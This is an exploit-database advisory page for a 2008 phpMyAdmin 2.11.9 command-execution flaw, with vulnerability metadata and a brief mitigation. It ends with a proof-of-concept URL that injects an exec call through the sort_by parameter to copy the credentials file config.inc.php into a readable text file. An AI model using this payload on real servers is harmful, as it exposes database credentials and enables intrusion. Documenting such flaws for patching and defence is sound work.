header-logo
Suggest Exploit
vendor:
phpMyAdmin
by:
SecurityFocus
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: phpMyAdmin
Affected Version From: phpMyAdmin 2.11.9
Affected Version To: phpMyAdmin 2.11.9.1
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmyadmin:phpmyadmin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpMyAdmin Command Execution Vulnerability

phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Successful attacks can compromise the affected application and possibly the underlying computer.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31188/info

phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

This issue affects versions prior to phpMyAdmin 2.11.9.1.

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]